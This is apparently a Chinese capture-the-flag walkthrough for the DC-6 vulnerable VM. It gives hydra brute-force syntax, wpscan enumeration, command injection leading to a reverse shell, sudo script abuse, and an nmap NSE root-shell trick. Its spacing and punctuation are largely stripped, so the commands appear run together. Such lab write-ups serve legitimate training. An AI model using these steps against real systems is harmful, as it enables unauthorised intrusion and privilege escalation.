公司动态

DC-6 靶机全流程攻略

📅 2026/8/21 9:00:01
DC-6 靶机全流程攻略
DC-6 靶机攻略扫描靶机目录爆破访问网站http://192.168.200.146/wp-admin/把hosts文件加入192.168.200.146 wordy进入网站进入刚刚目录爆破出的后台页面http://192.168.200.146/wp-admin/用wpscan扫用户名wpscan--urlhttp://wordy--enumerateu用cewl爬网站生成密码cewl http://wordy-wpass.txt爆破但是没爆破出来换一个更大的字典直接跑kali自带的字典hydra-Lusers.txt-P/usr/share/wordlists/rockyou.txt wordy http-post-form/wp-login.php:log^USER^pwd^PASS^wp-submitLog Intestcookie1:SLocation-t20-F这也太久了全部跑完10天往上了查资料发现mark的密码是helpdesk01刚好rockyou字典里有就当爆破出来了登录mark的账号找到可以输入IP的工具试试能不能命令注入确实可以注入反弹shell由于输入框限制了字数改发包Bash不行换nc成功获取伪终端python-cimport pty;pty.spawn(/bin/bash)查看提权点sudo-lfind/-perm-4000-typef2/dev/null查看文件发现在mark家目录里有一个thingtodo文件记录了graham的密码GSo7isUM1D4登录graham账户查看提权点发现graham 可以以 jens 身份无密码执行/home/jens/backups.sh往脚本加入/bin/bash以jens身份跑该脚本sudo-ujens /home/jens/backups.sh查看提权点jens可以以root身份无密码执行nmapnmap 有一个--script参数可以加载外部的 lua 脚本执行可以写一个脚本来获取root shellechoos.execute(/bin/sh)/tmp/root.nsesudonmap--script/tmp/root.nse--script参数只认 .nseNmap Scripting Engine后缀的文件拿到flag